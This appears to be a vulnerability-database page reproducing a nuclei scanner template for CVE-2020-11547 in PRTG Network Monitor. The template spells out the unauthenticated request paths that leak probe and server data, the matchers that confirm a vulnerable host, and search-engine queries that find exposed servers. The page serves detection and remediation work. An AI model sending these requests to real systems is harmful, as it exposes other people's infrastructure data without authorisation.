Lucene search
K

PRTG Network Monitor <20.1.57.1745 - Information Disclosure

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

PRTG Network Monitor <20.1.57.1745 - Information Disclosure. Attacker can obtain information about probes and the server via an HTTP request, potentially modifying data or executing unauthorized operations

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Paessler PRTG Network Monitor Information Disclosure Vulnerability
7 Apr 202000:00
cnvd
CVE
CVE-2020-11547
4 Apr 202023:23
cve
Cvelist
CVE-2020-11547
4 Apr 202023:23
cvelist
NVD
CVE-2020-11547
5 Apr 202000:15
nvd
OpenVAS
PRTG Network Monitor < 20.1.57.1745 Information Disclosure Vulnerability
6 Apr 202000:00
openvas
OSV
CVE-2020-11547
5 Apr 202000:15
osv
Prion
Cross site request forgery (csrf)
5 Apr 202000:15
prion
Tenable Nessus
PRTG Network Monitor < 20.1.57.1745 Information Disclosure (direct check)
4 Mar 202100:00
nessus
RedhatCVE
CVE-2020-11547
22 May 202516:10
redhatcve
id: CVE-2020-11547

info:
  name: PRTG Network Monitor <20.1.57.1745 - Information Disclosure
  author: x6263
  severity: medium
  description: PRTG Network Monitor before 20.1.57.1745 is susceptible to information disclosure. An attacker can obtain information about probes running or the server itself via an HTTP request, thus potentially being able to modify data and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the PRTG Network Monitor.
  remediation: |
    Upgrade PRTG Network Monitor to version 20.1.57.1745 or higher to mitigate the information disclosure vulnerability.
  reference:
    - https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
    - https://github.com/ch-rigu/PRTG-Network-Monitor-Information-Disclosure
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11547
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-11547
    cwe-id: CWE-306
    epss-score: 0.52059
    epss-percentile: 0.98824
    cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: paessler
    product: prtg_network_monitor
    shodan-query:
      - title:"prtg"
      - http.title:"prtg"
    fofa-query: title="prtg"
    google-query: intitle:"prtg"
  tags: cve2020,cve,prtg,disclosure,paessler,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/public/login.htm?type=probes"
      - "{{BaseURL}}/public/login.htm?type=requests"
      - "{{BaseURL}}/public/login.htm?type=treestat"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"

      - type: word
        part: body
        words:
          - "prtg_network_monitor"
          - "Probes"
          - "Groups"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207d90ae401b20db4734dfec0c129d5a0eecf4a844a95a9084a9e78e482af8399f0221009534f221c52329ec0cbd275a70b45edf584b11583f7674bd24004f3ea697845c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 25
CVSS 3.15.3
EPSS0.52059
31